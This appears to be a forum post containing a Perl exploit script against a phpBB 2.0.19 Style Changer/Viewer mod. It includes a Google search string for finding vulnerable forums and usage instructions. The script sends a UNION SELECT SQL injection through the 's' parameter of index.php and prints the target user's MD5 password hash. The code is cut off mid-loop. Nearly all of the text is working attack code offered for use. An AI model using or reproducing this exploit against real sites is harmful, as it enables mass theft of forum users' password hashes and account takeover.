phpbb 2.0.19

[HTML]#!/usr/bin/perl


\phpBB Style Changer/Demo Mod-->GET HASH EXPLOIT
\Testuar By Spy-x
\kc-code.com
\www.kc-code.com
\spy-x@kc-code.com
\Albania
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\
\Kerko Ne Google: \
\"Powered by phpBB" inurl:"index.php?s" OR inurl:"index.php?style"\
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\\

use IO::Socket;
if (@ARGV < 3){
print q{
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\
\ phpBB Style Changer\Viewer MOD SQL injection Exploit \
\ Testuar në phpBB 2.0.19 \
\ Testuar nga Ksova-Crackers Spy-x. kcc\
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\
bbstyle.pl [HOST] [PATH] [Target id]
bbstyle.pl www.host.com /phpbb2/ 2
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\
};
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$id = $ARGV[2];
print "[+]Make Connection\n";
$serv =~ s/(http:\/\/)//eg;
$path = $dir.'index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null%20FR OM%20phpbb_users%20Where%20user_id='.$id.'/*';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Connect Failed\r\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "[+]Connected\n";
while ($hash = <$socket>){
$hash =~ m/open(.*?)template/ && print "[+]User id: $id\n[+]Md5 Hash: $1\n";